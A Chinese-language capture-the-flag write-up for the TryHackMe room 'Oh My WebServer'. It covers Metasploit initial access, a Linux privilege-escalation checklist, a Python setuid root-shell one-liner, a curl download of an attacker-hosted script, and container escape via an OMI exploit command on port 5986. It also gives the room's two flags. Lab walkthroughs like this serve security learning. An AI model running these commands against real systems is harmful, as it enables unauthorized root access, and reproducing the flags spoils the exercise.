[TryHackMe]Oh My WebServer(nday漏洞+容器逃逸)

1.信息收集

nmap扫描

查找相应exploit

2.GetShell

使用msfconsole

设置好参数后getshell

home中没有任何东西

在根目录下有个.dockerenv文件

我们可以判断我们的shell在docker容器中

3.容器提权

Linux提权基本手段:

1.SUID提权 find / -type f -perm -040000 -l 2>/dev/null

2.sudo部分权限 提权 sudo -l

3.修改二进制文件提权 getcap -r / 2>/dev/null

4.查看任务表定时启动文件提权 cat /etc/crontab

5.PATH权限提权 echo $PATH

6.NFS网络文件共享提权 cat /etc/exports

查看二进制文件发现py3.7

复制代码
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

THM{eacffefe1d2aafcc15e70dc2f07f7ac1}

4.容器逃逸 从root(Docker)到root(主机)

我找找到了

172.17.0.2

编写一个脚本

上传脚本

curl http://IP/1.py

查看开放端口

复制代码
port 22 is open
port 80 is open
port 5986 is open

5986端口正在托管 OMI 服务

复制代码
python3 omi.py -t 172.17.0.1 -c 'cat /root/root.txt'

THM{7f147ef1f36da9ae29529890a1b6011f}

相关推荐
椎名澄嵐20 小时前
★ Linux ★ 信号
linux·运维·服务器·开发语言·c++
程序猿(雷霆之王)20 小时前
应用层协议——HTTP
网络·网络协议·http
李白你好20 小时前
Auto_CVE - 自动化漏洞挖掘系统
运维·自动化
Never_z&y20 小时前
HTTP学习之路:代理中的缓存投毒
网络·网络安全·缓存
sdszoe492221 小时前
华为无线网络技术基础
网络·智能路由器·wlan·无线局域网
情深不寿31721 小时前
传输层————TCP
linux·网络·c++·tcp/ip
christine-rr21 小时前
【25软考网工】第五章(10) Internet应用
linux·网络·经验分享·笔记·软考
触想工业平板电脑一体机21 小时前
【触想智能】工业一体机在金融领域的应用优势和具体注意事项
运维·人工智能·安全·金融·机器人·自动化
Sunhen_Qiletian21 小时前
从传统CNN到ResNet:深度学习中的深层网络革命
网络·深度学习·cnn
Arenaschi1 天前
Android
android·linux·运维·笔记·其他·docker